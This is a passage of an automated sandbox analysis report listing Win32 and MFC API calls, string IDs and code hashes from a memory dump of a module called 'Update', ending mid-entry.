                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window$ChildFocusVisible
                                              • String ID:
                                              • API String ID: 1252167185-0
                                              • Opcode ID: 25a9f014fde8bc76df15c2eb9e5a4cf06ae1fd3b3c30fa112e9b0570ba994eb5
                                              • Instruction ID: 6b00e514178e0bdbf6448011f1f155f176ff3888e5d838c13457e4e7bba96f35
                                              • Opcode Fuzzy Hash: 25a9f014fde8bc76df15c2eb9e5a4cf06ae1fd3b3c30fa112e9b0570ba994eb5
                                              • Instruction Fuzzy Hash: D021D07220260AEBDB11AB24C844F6A7BB4FF0EB06F500025FD5796560EB70E820DB80
                                              APIs
                                              • GetDesktopWindow.USER32 ref: 6C1DC9E0
                                              • GetWindow.USER32(00000000), ref: 6C1DC9E7
                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 6C1DCA15
                                              • ShowWindow.USER32(00000000,00000000), ref: 6C1DCA30
                                              • ShowWindow.USER32(00000000,00000004), ref: 6C1DCA51
                                              • GetWindow.USER32(00000000,00000002), ref: 6C1DCA5E
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Window$Show$DesktopLong
                                              • String ID:
                                              • API String ID: 3178490500-0
                                              • Opcode ID: efadace4673514fc8ca5e937123368a716134a7c68b2367e38befc2be165fb62
                                              • Instruction ID: e91ae95fcad28bb1713cb83b4814cc9f671d9233f7a6bc88575e62ccd2a7cad8
                                              • Opcode Fuzzy Hash: efadace4673514fc8ca5e937123368a716134a7c68b2367e38befc2be165fb62
                                              • Instruction Fuzzy Hash: 68112C71206B1567DB12EA219C29B5A3768AF127AAF179B52FD1195680EB60F000C7D4
                                              APIs
                                              • __EH_prolog3_catch.LIBCMT ref: 6C21AA28
                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000080,6C27C517,?,00000000,?,?,00000000), ref: 6C21AA63
                                                • Part of subcall function 6C20D2FC: __EH_prolog3.LIBCMT ref: 6C20D303
                                              • GetTempPathW.KERNEL32(00000104,00000000,00000104,?,00000000,00000080,6C27C517,?,00000000,?,?,00000000), ref: 6C21AA84
                                              • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,04000100,00000000,000000FF,?,00000104,000000FF,?,?,00000000), ref: 6C21AAD9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: CloseCreateFileH_prolog3H_prolog3_catchHandlePathTemp
                                              • String ID: AFX
                                              • API String ID: 775233504-1300893600
                                              • Opcode ID: 427c0fe8df69fd8b1d9710f64a27a69b8c8384ee793c2e980b0dcbe5357558f0
                                              • Instruction ID: a3281225a093281cd8bc6f7d50271ee9c6534ee343114138bac713bb9c2bd617
                                              • Opcode Fuzzy Hash: 427c0fe8df69fd8b1d9710f64a27a69b8c8384ee793c2e980b0dcbe5357558f0
                                              • Instruction Fuzzy Hash: 2C416E70A00149DBDB05DFA4C994FEEB7B8BF65308F104169E916A7BD0DB34AB09CB61
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 6C218ECD
                                              • InflateRect.USER32(?,00000005,00000005), ref: 6C218F0B
                                              • Ellipse.GDI32(00000000,?,00000000,?,?), ref: 6C218FD6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: EllipseH_prolog3_InflateRect
                                              • String ID: (^4l$Gu,
                                              • API String ID: 3279685039-3311905259
                                              • Opcode ID: 57bcf70a7f55da13873792799ab5fa0e048045f8ab028b9167951f823f717799
                                              • Instruction ID: c6f313b559d6b5fc6786f79d19b27b7bcb2b9ecd6e2bd49c547194c13198e812
                                              • Opcode Fuzzy Hash: 57bcf70a7f55da13873792799ab5fa0e048045f8ab028b9167951f823f717799
                                              • Instruction Fuzzy Hash: E0414C31A001089FDF01DFA4C995BEE7BF6AF49304F554069E901A7B90DB34AE08CFA1
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: __snprintf_s$ClassInfo
                                              • String ID: Afx:%p:%x$Afx:%p:%x:%p:%p:%p
                                              • API String ID: 1341824228-2801496823
                                              • Opcode ID: 88b1927948869d69a5354e722bd78eb638d4f70831ed514d9a14ad2bb08afe52
                                              • Instruction ID: 6f0c0c53a7bd7eba9f7680d6387e6352f805f253908f8f1fc76ccdde5dbabe40
                                              • Opcode Fuzzy Hash: 88b1927948869d69a5354e722bd78eb638d4f70831ed514d9a14ad2bb08afe52
                                              • Instruction Fuzzy Hash: 593136B1A00209EFDB01DFAAC844ACE7BF8FF89309F014056E554AB751D734AA548FA2
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: EmptyRect$CursorState
                                              • String ID: 0^5l
                                              • API String ID: 2369637639-1366870978
                                              • Opcode ID: 11fa650491c8f3b21d96edb448d9ed78138d378318979d5de2c081e35975783d
                                              • Instruction ID: fa2215ac0a0daa4085530996be66cb79fbb9caee1f92ab30c6416a77bdd585bf
                                              • Opcode Fuzzy Hash: 11fa650491c8f3b21d96edb448d9ed78138d378318979d5de2c081e35975783d
                                              • Instruction Fuzzy Hash: C2214275E0121EAFDF11DFB488849EFBBBDEF09645B100529E805F3240EB349944DBA1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Edit
                                              • API String ID: 0-554135844
                                              • Opcode ID: 3f724b80ce4691737227be6e87d1137ac774faec2c224caff5ebe7d28bb12511
                                              • Instruction ID: cbdb3c9dde867c8903db557d800e3f1cf60526b2c1e72fe1af6380d3089d1a9e
                                              • Opcode Fuzzy Hash: 3f724b80ce4691737227be6e87d1137ac774faec2c224caff5ebe7d28bb12511
                                              • Instruction Fuzzy Hash: 61110870356201ABFF119A35CC04FAE77A8AF02B58F1205E5E6A2D1DA0DB65F440C772
                                              APIs
                                              • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 6C210B35
                                              • GetProcAddress.KERNEL32(00000000,CreateFileTransactedW), ref: 6C210B45
                                              • CreateFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 6C210B8E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: AddressCreateFileHandleModuleProc
                                              • String ID: CreateFileTransactedW$kernel32.dll
                                              • API String ID: 2580138172-2053874626
                                              • Opcode ID: d71589e84930e1dcb57eae02e426575d13a809d5bd8371c37f101e95f3e87ede
                                              • Instruction ID: bdb095fa05681061bf97c20a2a5cc3a76a6bb51378ef561f90895a4ee6da2516
                                              • Opcode Fuzzy Hash: d71589e84930e1dcb57eae02e426575d13a809d5bd8371c37f101e95f3e87ede
                                              • Instruction Fuzzy Hash: 1801257250524EBFDF120E94CC04CAB3FBEFB493AA7104529FA2551820C732CA30EB60
                                              APIs
                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,8BAE044A,?,?,00000000,6C334D80,000000FF,?,6C318DEC,6C318CC6,?,6C318E88,00000000), ref: 6C318D60
                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6C318D72
                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,6C334D80,000000FF,?,6C318DEC,6C318CC6,?,6C318E88,00000000), ref: 6C318D94
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: AddressFreeHandleLibraryModuleProc
                                              • String ID: CorExitProcess$mscoree.dll
                                              • API String ID: 4061214504-1276376045
                                              • Opcode ID: d67438d18597893edc83c883bc1ccac9b4548c376c4d80a51d388b2d1705cff1
                                              • Instruction ID: 8a38b22facfb13ac6900bf4fea7daa2671f8528f83fe6c790138417b71fd062b
                                              • Opcode Fuzzy Hash: d67438d18597893edc83c883bc1ccac9b4548c376c4d80a51d388b2d1705cff1
                                              • Instruction Fuzzy Hash: 9E01DB31A15659EFDF029F50CC04FAE7BBCFB06715F010A29F811A2A90DB799900CF94
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Rect$Empty$Client
                                              • String ID:
                                              • API String ID: 1457177775-0
                                              • Opcode ID: 96dcd4f08b01914e37cfd4c148c481cdb5b9a5d1079c0a0b2492197d06b9ed47
                                              • Instruction ID: d00fd4fd50f4395e1252592db9a5716472a71baa3e6be05de369efff736236bb
                                              • Opcode Fuzzy Hash: 96dcd4f08b01914e37cfd4c148c481cdb5b9a5d1079c0a0b2492197d06b9ed47
                                              • Instruction Fuzzy Hash: 05D12931E01619CFCF05CFA8C5946DEBBF2BF4A314F254169E825BB640D771AA46CBA0
                                              APIs
                                              • __EH_prolog3_catch.LIBCMT ref: 6C1DA89C
                                              • GlobalLock.KERNEL32(00000000), ref: 6C1DA99E
                                              • DestroyWindow.USER32(00000000,?,00000000,00000000,6C1DB463,00000000,?,?,00000024), ref: 6C1DAA87
                                              • GlobalUnlock.KERNEL32(00000000), ref: 6C1DAA94
                                              • GlobalFree.KERNEL32(00000000), ref: 6C1DAA9B
                                                • Part of subcall function 6C1F6164: GetStockObject.GDI32(00000011), ref: 6C1F6186
                                                • Part of subcall function 6C1F6164: GetStockObject.GDI32(0000000D), ref: 6C1F6192
                                                • Part of subcall function 6C1F6164: GetObjectW.GDI32(00000000,0000005C,?), ref: 6C1F61A3
                                                • Part of subcall function 6C1F6164: GetDC.USER32(00000000), ref: 6C1F61B2
                                                • Part of subcall function 6C1F6164: GetDeviceCaps.GDI32(00000000,0000005A), ref: 6C1F61C9
                                                • Part of subcall function 6C1F6164: MulDiv.KERNEL32(?,00000048,00000000), ref: 6C1F61D5
                                                • Part of subcall function 6C1F6164: ReleaseDC.USER32(00000000,00000000), ref: 6C1F61E1
                                                • Part of subcall function 6C1F6276: GlobalFree.KERNEL32(?), ref: 6C1F627D
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Global$Object$FreeStock$CapsDestroyDeviceH_prolog3_catchLockReleaseUnlockWindow
                                              • String ID:
                                              • API String ID: 15253214-0
                                              • Opcode ID: c6516e9b822e5f11d98dcf18f9e82c7dab180072bfb45e3db6132b38d74810c0
                                              • Instruction ID: 9dac1885795a0921f8b3434321a401cd6bc68d0070f73707f82567ca1125300a
                                              • Opcode Fuzzy Hash: c6516e9b822e5f11d98dcf18f9e82c7dab180072bfb45e3db6132b38d74810c0
                                              • Instruction Fuzzy Hash: AE517230A01619DFDF05DFA4C954BEEBBB4BF19314F124155E812A7790DB34AE05CB90
                                              APIs
                                              • LoadCursorW.USER32(?,00007904), ref: 6C200BD3
                                              • LoadCursorW.USER32(?,00007905), ref: 6C200C06
                                              • LoadCursorW.USER32(00000000,00007F86), ref: 6C200C31
                                              • CreatePen.GDI32(00000000,00000001,?), ref: 6C200CA9
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: CursorLoad$Create
                                              • String ID:
                                              • API String ID: 1516763891-0
                                              • Opcode ID: dc2789cb6c6197c2e733f3d7423abc11abbed3f738697d6e220bf6d6cd9c2f00
                                              • Instruction ID: 48f70c573ea53f6f9854ab03ce4642cb464619b05090acd1dd0ab89815a9cf82
                                              • Opcode Fuzzy Hash: dc2789cb6c6197c2e733f3d7423abc11abbed3f738697d6e220bf6d6cd9c2f00
                                              • Instruction Fuzzy Hash: D531E670B402469FEB119BB58888FEE36E8AF46319F140177FD19DBB81DF3488058B61
                                              APIs
                                              • IsWindowVisible.USER32(?), ref: 6C284E7A
                                              • SendMessageW.USER32(00000000,0000000B,00000000,00000000), ref: 6C284EA4
                                              • GetWindowRect.USER32(?,?), ref: 6C284EB7
                                              • SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 6C284F0D
                                              • RedrawWindow.USER32(00000000,00000000,00000000,00000185), ref: 6C284F23
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Window$MessageSend$RectRedrawVisible
                                              • String ID:
                                              • API String ID: 1695962874-0
                                              • Opcode ID: 230b10636c2b704f42645a7d8ef4ac2a39637d14a28d9b7bd42624ba19bf8114
                                              • Instruction ID: c212ca9d4acbc12264c5c2dd0420f825c777d249aa42b8dc1379e4cc90f51ed6
                                              • Opcode Fuzzy Hash: 230b10636c2b704f42645a7d8ef4ac2a39637d14a28d9b7bd42624ba19bf8114
                                              • Instruction Fuzzy Hash: D5312F71A0521AAFEB11CF68CD84FAEB7BCFB09315F104659F966A71D0DB70A904CB10
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Rect$Window
                                              • String ID:
                                              • API String ID: 924285169-0
                                              • Opcode ID: ca600d6d6dabfdb4d4193dbdb682c93565cab3ae277638b8df54130be9839ba7
                                              • Instruction ID: 34d3f3fba490e9044b2a0c9158c1984e2494ebbe68b9ca0034f14f128b3ad2c3
                                              • Opcode Fuzzy Hash: ca600d6d6dabfdb4d4193dbdb682c93565cab3ae277638b8df54130be9839ba7
                                              • Instruction Fuzzy Hash: 30216F35A0520E9BDB01EB75C848AAFB7BDBF4A745B504119F906E3600EB3099509B50
                                              APIs
                                              • __EH_prolog3.LIBCMT ref: 6C23AF87
                                              • IsWindowVisible.USER32(?), ref: 6C23AF9F
                                              • IsWindowVisible.USER32(?), ref: 6C23AFAC
                                              • IsWindowVisible.USER32(?), ref: 6C23AFDE
                                              • SendMessageW.USER32(?,00000085,00000000,00000000), ref: 6C23B042
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: VisibleWindow$H_prolog3MessageSend
                                              • String ID:
                                              • API String ID: 3429043573-0
                                              • Opcode ID: 532544a7336f34fe5afad0cd4e9879a9ddae87c36117edae1321341a745d40ce
                                              • Instruction ID: 0f8b8f525192cee08e82b1080107a1b616f1731265c5b39dc86f2ff411d656f8
                                              • Opcode Fuzzy Hash: 532544a7336f34fe5afad0cd4e9879a9ddae87c36117edae1321341a745d40ce
                                              • Instruction Fuzzy Hash: 1F21A37160162A9FDF00DFA4CD94BEE77B4BF54749B100429E45AA7A90EF34A908CB21
                                              APIs
                                              • GetCurrentThreadId.KERNEL32 ref: 6C1F8941
                                              • SetWindowsHookExW.USER32(00000007,6C1FF8A4,00000000,00000000), ref: 6C1F8951
                                              • UnhookWindowsHookEx.USER32(00000000), ref: 6C1F8969
                                              • UpdateWindow.USER32(?), ref: 6C1F89E1
                                              • SendMessageW.USER32(?,00000362,0000E001,00000000), ref: 6C1F89FD
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: HookWindows$CurrentMessageSendThreadUnhookUpdateWindow
                                              • String ID:
                                              • API String ID: 1891640330-0
                                              • Opcode ID: 0ef450b9ec7669e7562870a54eb7a1e8eac592a129c07bf951e68cc41d5095c7
                                              • Instruction ID: 8f01c9cc72dd2a0c30531bfe44a9a4f64a31e150a87cac4de695eaa0e61d7e31
